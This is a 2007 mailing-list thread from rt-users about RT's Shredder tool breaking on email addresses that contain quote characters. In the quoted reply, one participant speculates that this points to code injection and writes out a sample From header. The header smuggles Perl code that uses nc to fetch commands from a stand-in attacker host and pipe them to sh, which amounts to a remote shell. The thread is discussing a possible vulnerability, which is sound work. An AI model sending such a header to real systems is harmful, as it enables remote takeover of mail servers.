[rt-users] Spam email question

Mathew theillien at yahoo.com
Thu Feb 8 13:24:32 EST 2007 

It is definitely the email portion and not the RT username portion.
When I get to work tonight I will create a user with an email address
such as the one I describe so I can reproduce the error.  I'll post it here.

Mathew

der Mouse wrote:
>> Shredder doesn't like when an email address contains either a single-
>> or double-qoute.
> 
> An email address, or the name associated with an email address?  If it
> really is broken enough to get upset when an email address includes
> unbalanced quotes, it's, well, broken; "\(*&$%\""@example.com is a
> perfectly good email address, as is '^#&!`|@example.com.  (Some people
> have even used such addresses, and find they don't get picked up by
> spammer scrapeware - a useful property for email addresses to have.)
> 
> Even if it's the associated name, I'd call that somewhat broken.  I
> know someone who uses "Patrick O'Reilly" as the name portion of his
> email address (not coincidentally, that's his name).
> 
>> Understandably so considering this messes with Perl and makes it look
>> for a closing, matching mark.
> 
> I find that extremely disturbing, because it implies that RT is
> encountering these things in contexts where its string parsing code is
> kicking in.  This makes me wonder if perhaps a mail bearing a header
> like
> 
> From: "; system('cat /dev/null | nc evil.cracker.example.org 12345 | sh'); $dummy = " <me at innocent.example.org>
> 
> would do something nasty.  (It would even be legal from an email point
> of view.)
> 
> /~\ The ASCII				der Mouse
> \ / Ribbon Campaign
>  X  Against HTML	       mouse at rodents.montreal.qc.ca
> / \ Email!	     7D C8 61 52 5D E7 2D 39  4E F1 31 3E E8 B3 27 4B
> _______________________________________________
> http://lists.bestpractical.com/cgi-bin/mailman/listinfo/rt-users
> 
> Community help: http://wiki.bestpractical.com
> Commercial support: sales at bestpractical.com
> 
> 
> Discover RT's hidden secrets with RT Essentials from O'Reilly Media. 
> Buy a copy at http://rtbook.bestpractical.com
> 
>

More information about the rt-users mailing list